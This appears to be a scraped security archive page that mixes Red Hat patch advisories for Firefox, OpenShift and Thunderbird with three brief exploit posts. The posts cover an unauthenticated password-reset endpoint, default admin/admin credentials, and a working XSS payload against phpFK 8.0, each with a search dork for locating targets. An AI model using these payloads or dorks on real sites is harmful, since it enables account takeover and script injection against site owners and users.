Red Hat Security Advisory 2023-3560-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.12.0 ESR.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:3560-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3560  
Issue date:        2023-06-12  
CVE Names:         CVE-2023-34414 CVE-2023-34416   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.12.0 ESR.

Security Fix(es):

* Mozilla: Click-jacking certificate exceptions through rendering lag  
(CVE-2023-34414)

* Mozilla: Memory safety bugs fixed in Firefox 114 and Firefox ESR 102.12  
(CVE-2023-34416)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2212841 - CVE-2023-34414 Mozilla: Click-jacking certificate exceptions through rendering lag  
2212842 - CVE-2023-34416 Mozilla: Memory safety bugs fixed in Firefox 114 and Firefox ESR 102.12

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
firefox-102.12.0-1.el8_6.src.rpm

aarch64:  
firefox-102.12.0-1.el8_6.aarch64.rpm  
firefox-debuginfo-102.12.0-1.el8_6.aarch64.rpm  
firefox-debugsource-102.12.0-1.el8_6.aarch64.rpm

ppc64le:  
firefox-102.12.0-1.el8_6.ppc64le.rpm  
firefox-debuginfo-102.12.0-1.el8_6.ppc64le.rpm  
firefox-debugsource-102.12.0-1.el8_6.ppc64le.rpm

s390x:  
firefox-102.12.0-1.el8_6.s390x.rpm  
firefox-debuginfo-102.12.0-1.el8_6.s390x.rpm  
firefox-debugsource-102.12.0-1.el8_6.s390x.rpm

x86_64:  
firefox-102.12.0-1.el8_6.x86_64.rpm  
firefox-debuginfo-102.12.0-1.el8_6.x86_64.rpm  
firefox-debugsource-102.12.0-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-34414  
https://access.redhat.com/security/cve/CVE-2023-34416  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZIlEuNzjgjWX9erEAQianw/+NJjYjUGQRtwJrAtva8U30vO0pFLiUTMn  
1SDAu+7y1SrZzl4VPsbMfxFI3ySigT2WgzSJ69uO3PaJSE71PMj5o5NCIIEqd+S7  
PVB7Hz/4wqOcj5sVW1BCByIy5AUNfhXkZgfkm1j6ds5RMPmXdikV/35b0deVRO7n  
NFQkElo3P7tqUjmC6sqK1jeGOJYso8amqCBPtvW0gwsTlN7OOFa9mKiofouqqfzo  
7wPzAoxSmwRfhi5+hmuoKHROD5+0Fh8UBBQnBVwUKkzemuXJr+142mOTTwMMGhKV  
JWPpD7XegscW2qjn6m4iOAliVkynhPZer1YmlsKLYcCQHXidDmL60E+gA2t/YG+E  
D5nB+1SKZZnvkVwi8aXPNdcM8/edyVKxDrztUvxdCUo6Y9buv10BWqgvQKxtxcHt  
8UAl1Bl2h8QbccCI5ZuBrkUz8qSB3hCdMDfcnDU1yK3A/4k2PpEO14AzqZh0E8gQ  
0zq7qg9RMrwOy+ylYR4Bn6p5ThzgjBFcY8p/vImgww6ZNURc/llL3MIbuIS6w9OA  
Fm5qdVr6o3vRP0skJtRou3uFBXyxTmCemtE4aNo5UMUQA0EkHlnjAdMLSe3EUcSz  
7h1p2mNqE9o0YFza3vQmZXO/nL3a2edVD/l0BfHFpoaRAo8OntnJna5Ihsiv5CDT  
WmUMvyvGE20=  
=kLDb  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3560-01

Purle Devloper Panel version 1.0 suffers from an insecure direct object reference vulnerability that allows an unauthenticated user to update passwords.

    ====================================================================================================================================| # Title     : Purle Devloper Panel ver 1.0 Unauthorized administrative access Vulnerability                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : http://www.njmweb.we.bs/Purple10/PURPLEV10.zip                                                                     |  | # Dork      : "Purle Devloper Panel"                                                                                             |====================================================================================================================================poc :[+] an unauthenticated access allow you to update password.[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /user_update.php[+] https://127.0.0.1/purple.iprebrandsapp/user_update.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Purle Devloper Panel 1.0 Insecure Direct Object Reference

Ptclab version 3.5 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Ptclab V3.5 Insecure Settings Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit)                                              | | # Vendor    : https://viserlab.com                                                                                               |  | # Dork      : "Every balance subtracting transactions need OTP verification so You can feel safe about your funds."              |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password  [+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin  & pass= admin[+] https://127.0.0.1/scriptviserlabcom/ptclab/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Ptclab 3.5 Insecure Settings

phpFK version 8.0 suffers from a cross site scripting vulnerability.

**phpFK 8.0 Cross Site Scripting**

Posted Jun 15, 2023

Authored by indoushka

phpFK version 8.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 485c60ad53bb4abb98ff8bd8586f25cee5d5a57abf5f55c1615b45b7b607c8e0

Download | Favorite | View

**phpFK 8.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : phpFK v8.0 version XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | | # Vendor    : https://www.frank-karau.de/demo-forum/                                                                             |  | # Dork      : Powered by: phpFK                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /forum/thread.php?board=4&thema=349'"><svg/onload=prompt(/_indoushka_/);>{{7*7}}[+] http://127.0.0.1/forum/thread.php?board=4&thema=349%27%22%3E%3Csvg/onload=prompt(/_indoushka_/);%3E{{7*7}}Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,379)
*   Arbitrary (16,086)
*   BBS (2,859)
*   Bypass (1,697)
*   CGI (1,024)
*   Code Execution (7,179)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,321)
*   DoS (23,204)
*   Encryption (2,363)
*   Exploit (51,247)
*   File Inclusion (4,196)
*   File Upload (956)
*   Firewall (821)
*   Info Disclosure (2,722)
*   Intrusion Detection (885)
*   Java (3,003)
*   JavaScript (842)
*   Kernel (6,586)
*   Local (14,394)
*   Magazine (586)
*   Overflow (12,621)
*   Perl (1,423)
*   PHP (5,129)
*   Proof of Concept (2,335)
*   Protocol (3,567)
*   Python (1,510)
*   Remote (30,539)
*   Root (3,567)
*   Rootkit (506)
*   Ruby (609)
*   Scanner (1,633)
*   Security Tool (7,856)
*   Shell (3,165)
*   Shellcode (1,211)
*   Sniffer (893)
*   Spoof (2,189)
*   SQL Injection (16,237)
*   TCP (2,395)
*   Trojan (687)
*   UDP (884)
*   Virus (664)
*   Vulnerability (31,601)
*   Web (9,579)
*   Whitepaper (3,745)
*   x86 (961)
*   XSS (17,701)
*   Other

**File Archives**

*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,980)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,762)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (345)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,894)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,380)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,666)
*   UNIX (9,249)
*   UnixWare (186)
*   Windows (6,558)
*   Other

phpFK 8.0 Cross Site Scripting

Red Hat Security Advisory 2023-3536-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.13.3.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.13.3 packages and security update  
Advisory ID:       RHSA-2023:3536-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3536  
Issue date:        2023-06-13  
CVE Names:         CVE-2023-30861   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.13.3 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.13.

Red Hat Product Security has rated this update as having a security impact  
of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Ironic content for Red Hat OpenShift Container Platform 4.13 - noarch  
Red Hat OpenShift Container Platform 4.13 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.13.3. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHSA-2023:3537

Security Fix(es):

* flask: Possible disclosure of permanent session cookie due to missing  
Vary: Cookie header (CVE-2023-30861)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.13 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

4. Solution:

For OpenShift Container Platform 4.13 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

5. Bugs fixed (https://bugzilla.redhat.com/):

2196643 - CVE-2023-30861 flask: Possible disclosure of permanent session cookie due to missing Vary: Cookie header

6. Package List:

Red Hat OpenShift Container Platform 4.13:

Source:  
cri-o-1.26.3-8.rhaos4.13.git9232b13.el8.src.rpm  
openshift-4.13.0-202305312300.p0.g7a891f0.assembly.stream.el8.src.rpm  
openshift-ansible-4.13.0-202305301841.p0.g148be47.assembly.stream.el8.src.rpm  
openshift-clients-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el8.src.rpm

aarch64:  
cri-o-1.26.3-8.rhaos4.13.git9232b13.el8.aarch64.rpm  
cri-o-debuginfo-1.26.3-8.rhaos4.13.git9232b13.el8.aarch64.rpm  
cri-o-debugsource-1.26.3-8.rhaos4.13.git9232b13.el8.aarch64.rpm  
openshift-clients-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el8.aarch64.rpm  
openshift-hyperkube-4.13.0-202305312300.p0.g7a891f0.assembly.stream.el8.aarch64.rpm

noarch:  
openshift-ansible-4.13.0-202305301841.p0.g148be47.assembly.stream.el8.noarch.rpm  
openshift-ansible-test-4.13.0-202305301841.p0.g148be47.assembly.stream.el8.noarch.rpm

ppc64le:  
cri-o-1.26.3-8.rhaos4.13.git9232b13.el8.ppc64le.rpm  
cri-o-debuginfo-1.26.3-8.rhaos4.13.git9232b13.el8.ppc64le.rpm  
cri-o-debugsource-1.26.3-8.rhaos4.13.git9232b13.el8.ppc64le.rpm  
openshift-clients-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el8.ppc64le.rpm  
openshift-hyperkube-4.13.0-202305312300.p0.g7a891f0.assembly.stream.el8.ppc64le.rpm

s390x:  
cri-o-1.26.3-8.rhaos4.13.git9232b13.el8.s390x.rpm  
cri-o-debuginfo-1.26.3-8.rhaos4.13.git9232b13.el8.s390x.rpm  
cri-o-debugsource-1.26.3-8.rhaos4.13.git9232b13.el8.s390x.rpm  
openshift-clients-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el8.s390x.rpm  
openshift-hyperkube-4.13.0-202305312300.p0.g7a891f0.assembly.stream.el8.s390x.rpm

x86_64:  
cri-o-1.26.3-8.rhaos4.13.git9232b13.el8.x86_64.rpm  
cri-o-debuginfo-1.26.3-8.rhaos4.13.git9232b13.el8.x86_64.rpm  
cri-o-debugsource-1.26.3-8.rhaos4.13.git9232b13.el8.x86_64.rpm  
openshift-clients-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el8.x86_64.rpm  
openshift-clients-redistributable-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el8.x86_64.rpm  
openshift-hyperkube-4.13.0-202305312300.p0.g7a891f0.assembly.stream.el8.x86_64.rpm

Red Hat OpenShift Container Platform 4.13:

Source:  
NetworkManager-1.42.2-2.el9_2.src.rpm  
conmon-2.1.7-1.1.rhaos4.13.el9.src.rpm  
cri-o-1.26.3-9.rhaos4.13.git9232b13.el9.src.rpm  
openshift-4.13.0-202305312300.p0.g7a891f0.assembly.stream.el9.src.rpm  
openshift-ansible-4.13.0-202305301841.p0.g148be47.assembly.stream.el9.src.rpm  
openshift-clients-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el9.src.rpm

aarch64:  
NetworkManager-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-adsl-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-adsl-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-bluetooth-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-bluetooth-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-cloud-setup-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-cloud-setup-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-debugsource-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-libnm-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-libnm-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-libnm-devel-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-ovs-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-ovs-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-ppp-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-ppp-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-team-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-team-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-tui-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-tui-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-wifi-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-wifi-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-wwan-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-wwan-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
conmon-2.1.7-1.1.rhaos4.13.el9.aarch64.rpm  
conmon-debuginfo-2.1.7-1.1.rhaos4.13.el9.aarch64.rpm  
conmon-debugsource-2.1.7-1.1.rhaos4.13.el9.aarch64.rpm  
cri-o-1.26.3-9.rhaos4.13.git9232b13.el9.aarch64.rpm  
cri-o-debuginfo-1.26.3-9.rhaos4.13.git9232b13.el9.aarch64.rpm  
cri-o-debugsource-1.26.3-9.rhaos4.13.git9232b13.el9.aarch64.rpm  
openshift-clients-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el9.aarch64.rpm  
openshift-hyperkube-4.13.0-202305312300.p0.g7a891f0.assembly.stream.el9.aarch64.rpm

noarch:  
NetworkManager-config-connectivity-redhat-1.42.2-2.el9_2.noarch.rpm  
NetworkManager-config-server-1.42.2-2.el9_2.noarch.rpm  
NetworkManager-dispatcher-routing-rules-1.42.2-2.el9_2.noarch.rpm  
NetworkManager-initscripts-updown-1.42.2-2.el9_2.noarch.rpm  
openshift-ansible-4.13.0-202305301841.p0.g148be47.assembly.stream.el9.noarch.rpm  
openshift-ansible-test-4.13.0-202305301841.p0.g148be47.assembly.stream.el9.noarch.rpm

ppc64le:  
NetworkManager-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-adsl-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-adsl-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-bluetooth-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-bluetooth-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-cloud-setup-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-cloud-setup-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-debugsource-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-libnm-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-libnm-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-libnm-devel-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-ovs-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-ovs-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-ppp-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-ppp-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-team-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-team-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-tui-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-tui-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-wifi-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-wifi-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-wwan-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-wwan-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
conmon-2.1.7-1.1.rhaos4.13.el9.ppc64le.rpm  
conmon-debuginfo-2.1.7-1.1.rhaos4.13.el9.ppc64le.rpm  
conmon-debugsource-2.1.7-1.1.rhaos4.13.el9.ppc64le.rpm  
cri-o-1.26.3-9.rhaos4.13.git9232b13.el9.ppc64le.rpm  
cri-o-debuginfo-1.26.3-9.rhaos4.13.git9232b13.el9.ppc64le.rpm  
cri-o-debugsource-1.26.3-9.rhaos4.13.git9232b13.el9.ppc64le.rpm  
openshift-clients-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el9.ppc64le.rpm  
openshift-hyperkube-4.13.0-202305312300.p0.g7a891f0.assembly.stream.el9.ppc64le.rpm

s390x:  
NetworkManager-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-adsl-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-adsl-debuginfo-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-bluetooth-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-bluetooth-debuginfo-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-cloud-setup-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-cloud-setup-debuginfo-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-debuginfo-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-debugsource-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-libnm-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-libnm-debuginfo-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-libnm-devel-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-ovs-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-ovs-debuginfo-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-ppp-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-ppp-debuginfo-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-team-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-team-debuginfo-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-tui-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-tui-debuginfo-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-wifi-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-wifi-debuginfo-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-wwan-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-wwan-debuginfo-1.42.2-2.el9_2.s390x.rpm  
conmon-2.1.7-1.1.rhaos4.13.el9.s390x.rpm  
conmon-debuginfo-2.1.7-1.1.rhaos4.13.el9.s390x.rpm  
conmon-debugsource-2.1.7-1.1.rhaos4.13.el9.s390x.rpm  
cri-o-1.26.3-9.rhaos4.13.git9232b13.el9.s390x.rpm  
cri-o-debuginfo-1.26.3-9.rhaos4.13.git9232b13.el9.s390x.rpm  
cri-o-debugsource-1.26.3-9.rhaos4.13.git9232b13.el9.s390x.rpm  
openshift-clients-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el9.s390x.rpm  
openshift-hyperkube-4.13.0-202305312300.p0.g7a891f0.assembly.stream.el9.s390x.rpm

x86_64:  
NetworkManager-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-adsl-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-adsl-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-bluetooth-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-bluetooth-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-cloud-setup-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-cloud-setup-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-debugsource-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-libnm-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-libnm-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-libnm-devel-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-ovs-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-ovs-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-ppp-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-ppp-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-team-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-team-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-tui-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-tui-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-wifi-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-wifi-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-wwan-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-wwan-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
conmon-2.1.7-1.1.rhaos4.13.el9.x86_64.rpm  
conmon-debuginfo-2.1.7-1.1.rhaos4.13.el9.x86_64.rpm  
conmon-debugsource-2.1.7-1.1.rhaos4.13.el9.x86_64.rpm  
cri-o-1.26.3-9.rhaos4.13.git9232b13.el9.x86_64.rpm  
cri-o-debuginfo-1.26.3-9.rhaos4.13.git9232b13.el9.x86_64.rpm  
cri-o-debugsource-1.26.3-9.rhaos4.13.git9232b13.el9.x86_64.rpm  
openshift-clients-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el9.x86_64.rpm  
openshift-clients-redistributable-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el9.x86_64.rpm  
openshift-hyperkube-4.13.0-202305312300.p0.g7a891f0.assembly.stream.el9.x86_64.rpm

Ironic content for Red Hat OpenShift Container Platform 4.13:

Source:  
python-flask-2.0.1-4.el9.2.src.rpm

noarch:  
python-flask-doc-2.0.1-4.el9.2.noarch.rpm  
python3-flask-2.0.1-4.el9.2.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-30861  
https://access.redhat.com/security/updates/classification/#important  
https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZIlEuNzjgjWX9erEAQhzZw//dt8uX+TXD7vD7cyQwgzBw8K+7q/ZGx+/  
iXzS5+ZmpJSnKgRpXjIDdWuErCxmaG3XNEla9VCNSY5tqrLLXA0tbA9IhiMFxutf  
uft7Qx/29UA7ROKSGBGT9Se2qP+3QC3E10vFYQ4OUqc+36fjoZF+EcxshkG3nQwh  
j9YaEnN2u10zz5OG19kJD2yfFF6bkc2Zk0twIX7B/xh4U7UObzzsDe9MrWtCRsqr  
AikryJs6Is7PnGPsfEQb7ZbeuaIkN74QoXTpO7+bsuTgIZMxnQXv7EaoB7JULAmT  
j/g0o1caIuC+MKkQTXQPPXnVzhrsQnEPo7oUYW+X1xFbXT+Nol46gnNSvetIeoAw  
YF9WwDEdHS3bQs8Rk+FsTPhGhnJ8cpPlmfDjkOFiWsxshDNULEGrHVMfT0CW2GaZ  
NP3En6nHsI4tbE/Ad4EFOmcSjTlwualSLLk6lgmh6ySbS9mZ4cy4JoBep8/VfajJ  
2pWjLuQRlnTqflu9j0Pkcx19ZGRsUC3gYLUsRyD/Zu1+kUSMVy3Cl44YYZUiqAjN  
13iWnZguP1rbVJSIz4sjC/MqHMBYeyv7lx8iLzx7RZsrWTbCW1ueYsW63XIjI0TD  
Robwqlz69Tge3t338Z6FArsFXZCKqAdPwhyQr490kcTkSNc/POp9AR4VkAnPpJxe  
0I6IQfiKXeo=  
=MVJf  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3536-01

Red Hat Security Advisory 2023-3566-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.12.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:3566-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3566  
Issue date:        2023-06-12  
CVE Names:         CVE-2023-34414 CVE-2023-34416   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.12.0.

Security Fix(es):

* Mozilla: Click-jacking certificate exceptions through rendering lag  
(CVE-2023-34414)

* Mozilla: Memory safety bugs fixed in Firefox 114 and Firefox ESR 102.12  
(CVE-2023-34416)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2212841 - CVE-2023-34414 Mozilla: Click-jacking certificate exceptions through rendering lag  
2212842 - CVE-2023-34416 Mozilla: Memory safety bugs fixed in Firefox 114 and Firefox ESR 102.12

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
